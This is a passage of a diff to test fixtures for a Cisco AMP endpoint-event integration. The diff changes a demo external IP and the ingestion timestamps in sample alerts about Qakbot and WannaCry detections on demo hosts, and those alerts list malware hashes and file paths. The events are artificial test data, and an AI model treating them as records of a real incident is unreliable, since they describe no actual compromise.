"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":233000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt 
Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -4385,7 +4385,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4430,7 +4430,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4440,8 +4440,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025327285Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:39.764184200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt 
Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -4461,7 +4461,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4506,7 +4506,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4516,8 +4516,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025329483Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:39.764190200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt 
Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -4537,7 +4537,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4584,7 +4584,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4598,8 +4598,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025331697Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"el2j9fcqj.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\el2j9fcqj.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:39.764196200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"el2j9fcqj.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\el2j9fcqj.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -4621,7 +4621,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4664,7 +4664,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4678,8 +4678,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025333936Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:39.764201Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -4701,7 +4701,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4744,7 +4744,7 @@ "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4758,8 +4758,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:14:44.025336406Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", + "ingested": "2021-12-09T13:35:39.764222200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -4781,7 +4781,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4822,7 +4822,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4832,8 +4832,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025338670Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:39.764226200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -4853,7 +4853,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4912,7 +4912,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4929,8 +4929,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025366396Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:39.764254100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4952,7 +4952,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -5015,7 +5015,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -5032,8 +5032,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025370523Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d